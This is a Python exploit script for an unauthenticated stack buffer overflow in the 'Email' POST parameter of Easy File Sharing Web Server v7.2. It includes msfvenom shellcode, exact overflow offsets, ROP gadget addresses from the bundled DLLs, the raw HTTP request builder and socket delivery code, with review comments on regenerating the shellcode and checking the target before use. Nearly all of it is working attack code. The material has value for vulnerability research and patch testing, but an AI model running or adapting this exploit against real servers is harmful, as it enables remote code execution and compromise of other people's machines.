Easy File Sharing Web Server version 7.2 POST Email unauthenticated remote buffer overflow exploit.
#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server v7.2 - POST 'Email' Unauthenticated Remote Buffer Overflow
# Exploit Author: boku (aka Bobby Cooke)
# Date: February 7th, 2020
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested On: Microsoft Windows 10 Home - 10.0.18363 Build 18363 - x64-based PC
# Microsoft Windows 10 Home - 10.0.18363 Build 18363 - x86-based PC
# Microsoft Windows 10 Pro - 10.0.18363 Build 18363 - x86-based PC
# Microsoft Windows 10 Edu - 10.0.18363 Build 18363 - x86-based PC
# About: Easy File Sharing Web Server v7.2 suffers from a stack buffer overflow. This overflow can be triggered by an unauthenticated,
# remote user via a malformed HTTP POST request. The application fails to properly handle the 'Email' parameter of a POST request
# to /login.htm. That POST is normally issued by the /register.ghp page when the registration form is submitted to create an
# account. The only check on the field is front-end JavaScript; client-side validation is not a security control and is
# bypassed by writing the request to the socket directly, as this script does.
# Recreate:
# 1) Download & install Easy File Sharing Web Server v7.2
# 2) Open the Application, the HTTP server should begin running on ports 80 & 443
# 3) Set the 'host' variable below to the IP address of the target device
# 4) Run this python script
# 5) The server process crashes and calc.exe is launched (the msfvenom windows/exec payload embedded below)
import socket
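# --- target -----------------------------------------------------------------
host = "192.168.70.134"   # IP of the host running Easy File Sharing Web Server v7.2
port = 80
timeout = 10              # seconds; the original blocked forever on an unreachable host

# --- shellcode --------------------------------------------------------------
# Bad chars: \x00, \x3b
# Expanding the buffer past 4028 bytes causes SEH to trigger
# root@kali# msfvenom -p windows/exec CMD=calc -b '\x00\x3b' -f python -v shellcode
# Payload size: 216 bytes
#
# NOTE(review): the bad-char set is only \x00 and \x3b, yet the generated bytes
# contain form metacharacters such as 0x26 ('&'), 0x2b ('+') and 0x3d ('=') and
# the exploit still works per the author's testing. That suggests the vulnerable
# copy runs on the raw request body before any x-www-form-urlencoded decoding.
# If you regenerate the shellcode, keep the same -b set and re-verify in a debugger.
shellcode = b""
shellcode += b"\xda\xcf\xbe\x33\x02\x8e\x27\xd9\x74\x24\xf4"
shellcode += b"\x5a\x33\xc9\xb1\x30\x31\x72\x18\x83\xc2\x04"
shellcode += b"\x03\x72\x27\xe0\x7b\xdb\xaf\x66\x83\x24\x2f"
shellcode += b"\x07\x0d\xc1\x1e\x07\x69\x81\x30\xb7\xf9\xc7"
shellcode += b"\xbc\x3c\xaf\xf3\x37\x30\x78\xf3\xf0\xff\x5e"
shellcode += b"\x3a\x01\x53\xa2\x5d\x81\xae\xf7\xbd\xb8\x60"
shellcode += b"\x0a\xbf\xfd\x9d\xe7\xed\x56\xe9\x5a\x02\xd3"
shellcode += b"\xa7\x66\xa9\xaf\x26\xef\x4e\x67\x48\xde\xc0"
shellcode += b"\xfc\x13\xc0\xe3\xd1\x2f\x49\xfc\x36\x15\x03"
shellcode += b"\x77\x8c\xe1\x92\x51\xdd\x0a\x38\x9c\xd2\xf8"
shellcode += b"\x40\xd8\xd4\xe2\x36\x10\x27\x9e\x40\xe7\x5a"
shellcode += b"\x44\xc4\xfc\xfc\x0f\x7e\xd9\xfd\xdc\x19\xaa"
shellcode += b"\xf1\xa9\x6e\xf4\x15\x2f\xa2\x8e\x21\xa4\x45"
shellcode += b"\x41\xa0\xfe\x61\x45\xe9\xa5\x08\xdc\x57\x0b"
shellcode += b"\x34\x3e\x38\xf4\x90\x34\xd4\xe1\xa8\x16\xb2"
shellcode += b"\xf4\x3f\x2d\xf0\xf7\x3f\x2e\xa4\x9f\x0e\xa5"
shellcode += b"\x2b\xe7\x8e\x6c\x08\x17\xc5\x2d\x38\xb0\x80"
shellcode += b"\xa7\x79\xdd\x32\x12\xbd\xd8\xb0\x97\x3d\x1f"
shellcode += b"\xa8\xdd\x38\x5b\x6e\x0d\x30\xf4\x1b\x31\xe7"
shellcode += b"\xf5\x09\x52\x66\x66\xd1\x95"

# --- overflow layout --------------------------------------------------------
# Offsets are from the start of the 'Email' value (the author's findings):
#   0     NOP sled (200 bytes)
#   200   shellcode (216 bytes)
#   416   \xcc filler up to the ECX overwrite
#   3996  CL, CH, high two bytes of ECX   ("ECX & SEH offset @ 3996")
#   4000  8 bytes of \x43 before EIP
#   4008  EIP  -> ret1
#   4012  12 bytes of filler
#   4024  ret2 (the author observed ESP 16 bytes past the EIP slot after ret1's ret)
#   4028  end; anything longer triggers SEH instead of the EIP overwrite
NOP_SLED_LEN = 200
ECX_OFFSET = 3996
PAYLOAD_LEN = 4028
BAD_CHARS = (b"\x00", b"\x3b")

# Gadget chain (addresses are hard-coded into DLLs shipped with EFS 7.2):
#  - EBX holds a PTR to the heap copy of the form body:
#    043A7864 0271836C l.q. ASCII "newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email=Aa0Aa1..
#  - the payload starts 0x3f (63) bytes into that string, i.e. right after the
#    63-byte prefix "newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email="
#  - ret1: 0x10011E19 [ImageLoad.dll]  add byte ptr ds:[ebx], ch ; ret
#          CH is the 0x3f written at offset 3997 (the CL/CH/ECX bytes below are
#          named after the ECX byte they land in), so [ebx] then points at the sled
#  - ret2: 0x61c4025b [sqlite3.dll]    jmp [ebx]
# NOTE(review): the add is a single-byte add and wraps mod 256 -- it lands on
# the sled only if the low byte of the heap pointer stored at [ebx] is <= 0xc0
# on the target (it was 0x6c in the author's dump).
# NOTE(review): both addresses are valid only if ImageLoad.dll and sqlite3.dll
# load at the bases the author observed; confirm the module bases on the
# target before relying on this chain.
RET1 = b"\x19\x1e\x01\x10"
RET2 = b"\x5b\x02\xc4\x61"


def build_payload(code=None):
    """Build the 4028-byte value of the 'Email' form field.

    Args:
        code: shellcode bytes placed after the NOP sled; defaults to the
            msfvenom blob above. Together with the sled it must fit before
            ECX_OFFSET and must not contain any of BAD_CHARS.

    Returns:
        The overflow string as bytes, exactly PAYLOAD_LEN long, with RET1 at
        offset 4008 and RET2 at offset 4024.

    Raises:
        ValueError: if the shellcode is too large (the original silently
            produced a shorter, misaligned buffer in that case), or if the
            assembled payload has the wrong length or contains a bad char.
    """
    if code is None:
        code = shellcode
    nops = b"\x90" * NOP_SLED_LEN
    room = ECX_OFFSET - len(nops) - len(code)
    if room < 0:
        raise ValueError("shellcode too large: %d bytes over the ECX offset" % -room)
    parts = [
        nops,
        code,
        b"\xcc" * room,      # pad up to the ECX overwrite
        b"\x42",             # CL
        b"\x3f",             # CH: the value ret1 adds to the byte at [ebx]
        b"\x42\x42",         # high two bytes of ECX
        b"\x43" * 8,         # pad up to EIP
        RET1,                # EIP
        b"\x42" * 12,        # pad up to where ESP points after ret1's ret
        RET2,
    ]
    payload = b"".join(parts)
    # Sanity-check the layout before putting it on the wire: a wrong length or a
    # stray bad char silently turns a calc pop into a plain crash.
    if len(payload) != PAYLOAD_LEN:
        raise ValueError("payload is %d bytes, expected %d" % (len(payload), PAYLOAD_LEN))
    for bad in BAD_CHARS:
        if bad in payload:
            raise ValueError("payload contains bad char %r" % bad)
    return payload


def build_request(target_host, payload):
    """Return the raw HTTP POST (bytes) that delivers *payload* in 'Email'.

    The framing is kept exactly as the author tested it: the header lines are
    followed directly by the body, with no separating blank line and no
    Content-Length. That is not RFC-compliant HTTP, but it is what the EFS
    parser accepted in the author's tests; do not "fix" it without re-testing
    against the target, since the offsets were measured with this framing.

    Args:
        target_host: hostname or IP used in the Host and Referer headers.
        payload: the bytes returned by build_payload().
    """
    h = target_host.encode("ascii")
    headers = [
        b"POST /login.htm HTTP/1.1",
        b"Host: " + h,
        b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
        b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        b"Accept-Language: en-US,en;q=0.5",
        b"Accept-Encoding: gzip, deflate",
        b"Referer: http://" + h + b"/register.ghp",
        b"Content-Type: application/x-www-form-urlencoded",
        b"Connection: close",
        b"Cookie: SESSIONID=16065; UserID=; PassWD=; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201",
        b"Upgrade-Insecure-Requests: 1",
    ]
    # 'register' is the form's submit button. The corpus copy of this line read
    # '&Avatar=&avatarURL=®ister=...' -- '&reg' mangled into an HTML entity --
    # which is both the wrong field name and a non-ASCII byte in the source.
    body = (
        b"frmLogin=true&frmUserID=newUser&frmUserPass=newPassword"
        b"&frmUserPass2=newPassword&Email=" + payload +
        b"&Avatar=&avatarURL=&register=Register%21"
    )
    return b"\r\n".join(headers) + b"\r\n" + body + b"\r\n"


def send_exploit(target_host, target_port, connect_timeout=timeout):
    """Connect to the target and write the exploit request.

    Prints progress to stdout. Network errors (refused, unreachable, timeout)
    are reported with the OS error text instead of being swallowed by a bare
    except, and the socket is always closed.

    Args:
        target_host: IP/hostname of the EFS server.
        target_port: TCP port the HTTP listener is on (80 by default).
        connect_timeout: socket timeout in seconds for connect() and send.
    """
    request = build_request(target_host, build_payload())
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(connect_timeout)
    try:
        sock.connect((target_host, target_port))
        print("[+] Successfully connected to " + target_host)
        # sendall(): a plain send() may write only part of the >4 KB request
        # and return without error, leaving the overflow string truncated.
        sock.sendall(request)
        print("[+] Payload Sent")
    except socket.error as exc:
        print("[-] Failure to launch: " + str(exc))
    finally:
        sock.close()


if __name__ == "__main__":
    send_exploit(host, port)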